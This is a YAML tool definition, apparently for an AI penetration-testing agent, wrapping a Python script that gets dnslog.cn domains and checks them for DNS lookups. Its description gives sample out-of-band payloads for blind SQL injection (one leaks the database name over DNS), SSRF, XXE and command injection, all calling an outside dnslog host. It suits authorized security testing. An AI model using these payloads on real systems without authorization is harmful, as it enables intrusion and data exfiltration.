mirror of
https://github.com/Ed1s0nZ/CyberStrikeAI.git
synced 2026-03-31 00:09:29 +02:00
68 lines
8.8 KiB
YAML
68 lines
8.8 KiB
YAML
name: "dnslog"
|
||
command: "python3"
|
||
args:
|
||
- "-c"
|
||
- "import sys\nimport requests\nimport json\nimport time\nimport os\nimport tempfile\n\nif len(sys.argv) < 2:\n sys.stderr.write(\"错误: 缺少操作类型参数 (get_domain 或 get_records)\\n\")\n sys.exit(1)\n\noperation = sys.argv[1]\nbase_url = \"http://dnslog.cn\"\n\n# 使用临时文件存储Cookie\ncookie_file = os.path.join(tempfile.gettempdir(), \"dnslog_cookie.txt\")\n\n# 创建session以保持Cookie\nsession = requests.Session()\n\n# 如果Cookie文件存在,加载Cookie\ntry:\n if os.path.exists(cookie_file):\n with open(cookie_file, 'r') as f:\n for line in f:\n if 'PHPSESSID' in line:\n session.cookies.set('PHPSESSID', line.strip().split('=')[1])\nexcept:\n pass\n\ntry:\n if operation == \"get_domain\":\n # 获取临时域名(这会设置Cookie)\n response = session.get(f\"{base_url}/getdomain.php\", timeout=10)\n response.raise_for_status()\n domain = response.text.strip().rstrip('%')\n \n # 保存Cookie到文件\n try:\n with open(cookie_file, 'w') as f:\n for cookie in session.cookies:\n f.write(f\"{cookie.name}={cookie.value}\\n\")\n except:\n pass\n \n if domain:\n result = {\n \"status\": \"success\",\n \"domain\": domain,\n \"message\": f\"成功获取临时域名: {domain}\",\n \"usage\": f\"使用此域名进行DNS查询测试,例如: nslookup {domain} 或 ping http://{domain}\",\n \"note\": \"域名有效期为24小时,请及时查询记录\"\n }\n print(json.dumps(result, ensure_ascii=False, indent=2))\n else:\n print(json.dumps({\n \"status\": \"error\",\n \"message\": \"未能获取到域名,请稍后重试\"\n }, ensure_ascii=False, indent=2))\n sys.exit(1)\n \n elif operation == \"get_records\":\n # 获取DNS查询记录\n if len(sys.argv) < 3:\n sys.stderr.write(\"错误: get_records 操作需要提供域名参数\\n\")\n sys.exit(1)\n \n domain = sys.argv[2]\n wait_time = int(sys.argv[3]) if len(sys.argv) > 3 and sys.argv[3] else 0\n \n # 如果指定了等待时间,先等待\n if wait_time > 0:\n print(f\"等待 {wait_time} 秒后查询记录...\", file=sys.stderr)\n time.sleep(wait_time)\n \n # 加载Cookie(如果存在)\n try:\n if os.path.exists(cookie_file):\n with open(cookie_file, 'r') as f:\n for line in f:\n if 'PHPSESSID' in line:\n session.cookies.set('PHPSESSID', line.strip().split('=')[1])\n except:\n pass\n \n response = session.get(f\"{base_url}/getrecords.php\", params={\"t\": domain}, timeout=10)\n response.raise_for_status()\n records_text = response.text.strip().rstrip('%')\n \n if records_text and records_text != \"[]\" and records_text.strip():\n # 尝试解析为JSON(如果返回的是JSON格式)\n try:\n records = json.loads(records_text)\n if isinstance(records, list) and len(records) > 0:\n result = {\n \"status\": \"success\",\n \"domain\": domain,\n \"record_count\": len(records),\n \"records\": records,\n \"message\": f\"发现 {len(records)} 条DNS查询记录\"\n }\n print(json.dumps(result, ensure_ascii=False, indent=2))\n else:\n result = {\n \"status\": \"no_records\",\n \"domain\": domain,\n \"records\": [],\n \"message\": \"暂无DNS查询记录,目标可能尚未触发DNS查询\"\n }\n print(json.dumps(result, ensure_ascii=False, indent=2))\n except json.JSONDecodeError:\n # 如果不是JSON,按行分割\n records = [line.strip() for line in records_text.split(\"\\n\") if line.strip() and line.strip() != \"[]\"]\n if records:\n result = {\n \"status\": \"success\",\n \"domain\": domain,\n \"record_count\": len(records),\n \"records\": records,\n \"message\": f\"发现 {len(records)} 条DNS查询记录\"\n }\n print(json.dumps(result, ensure_ascii=False, indent=2))\n else:\n result = {\n \"status\": \"no_records\",\n \"domain\": domain,\n \"records\": [],\n \"message\": \"暂无DNS查询记录\"\n }\n print(json.dumps(result, ensure_ascii=False, indent=2))\n else:\n result = {\n \"status\": \"no_records\",\n \"domain\": domain,\n \"records\": [],\n \"message\": \"暂无DNS查询记录,目标可能尚未触发DNS查询\"\n }\n print(json.dumps(result, ensure_ascii=False, indent=2))\n \n else:\n sys.stderr.write(f\"错误: 未知的操作类型 '{operation}',支持的操作: get_domain, get_records\\n\")\n sys.exit(1)\n\nexcept requests.RequestException as e:\n error_result = {\n \"status\": \"error\",\n \"message\": f\"请求失败: {str(e)}\",\n \"suggestion\": \"请检查网络连接或稍后重试\"\n }\n print(json.dumps(error_result, ensure_ascii=False, indent=2))\n sys.exit(1)\nexcept Exception as e:\n error_result = {\n \"status\": \"error\",\n \"message\": f\"执行出错: {str(e)}\"\n }\n print(json.dumps(error_result, ensure_ascii=False, indent=2))\n sys.exit(1)\n"
|
||
enabled: true
|
||
short_description: "DNSlog工具,用于盲注、SSRF、XXE等无回显漏洞验证"
|
||
description: |
|
||
DNSlog是一个DNS查询记录工具,通过dnslog.cn服务实现。主要用于验证无回显漏洞,如盲注、SSRF、XXE、命令注入等。
|
||
|
||
**主要功能:**
|
||
- 获取临时域名:生成一个唯一的临时域名用于DNS查询测试
|
||
- 查询DNS记录:查看是否有DNS查询请求到达该域名
|
||
- 支持等待时间:可在查询前等待指定时间,用于异步漏洞验证
|
||
|
||
**使用场景:**
|
||
- **盲SQL注入测试**:在SQL注入payload中使用DNS查询来确认注入成功
|
||
- 示例:`SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.xxx.dnslog.cn\\abc'))`
|
||
- **SSRF漏洞验证**:通过DNS查询确认SSRF漏洞存在
|
||
- 示例:`http://target.com/api?url=http://xxx.dnslog.cn`
|
||
- **XXE漏洞验证**:通过外部实体引用触发DNS查询
|
||
- 示例:`<!ENTITY xxe SYSTEM "http://xxx.dnslog.cn">`
|
||
- **命令注入测试**:在命令注入payload中使用DNS查询
|
||
- 示例:`nslookup xxx.dnslog.cn` 或 `ping xxx.dnslog.cn`
|
||
- **无回显漏洞验证**:任何需要确认目标是否执行了特定操作的情况
|
||
|
||
**工作流程:**
|
||
1. 使用 `operation=get_domain` 获取临时域名(如:`abc123.dnslog.cn`)
|
||
2. 在漏洞测试payload中使用该域名
|
||
3. 使用 `operation=get_records` 查询是否有DNS查询记录
|
||
4. 如果看到记录,说明漏洞存在且payload已执行
|
||
|
||
**注意事项:**
|
||
- 临时域名有效期为24小时
|
||
- DNS查询可能有延迟,建议等待几秒后再查询记录
|
||
- 该工具依赖dnslog.cn服务,需要网络连接
|
||
- 工具会自动管理Cookie会话,确保获取域名和查询记录使用同一会话
|
||
parameters:
|
||
- name: "operation"
|
||
type: "string"
|
||
description: |
|
||
操作类型,支持两种操作:
|
||
- `get_domain`: 获取临时域名
|
||
- `get_records`: 查询DNS记录
|
||
required: true
|
||
position: 0
|
||
format: "positional"
|
||
- name: "domain"
|
||
type: "string"
|
||
description: |
|
||
域名参数(仅用于get_records操作)
|
||
|
||
当operation为get_records时,此参数为必填,需要提供之前获取的临时域名。
|
||
required: false
|
||
position: 1
|
||
format: "positional"
|
||
- name: "wait_time"
|
||
type: "int"
|
||
description: |
|
||
等待时间(秒,仅用于get_records操作)
|
||
|
||
在查询DNS记录前等待的秒数。用于给目标系统足够时间执行DNS查询。
|
||
建议值:3-10秒,根据网络延迟和漏洞类型调整。
|
||
required: false
|
||
position: 2
|
||
format: "positional"
|
||
default: 0
|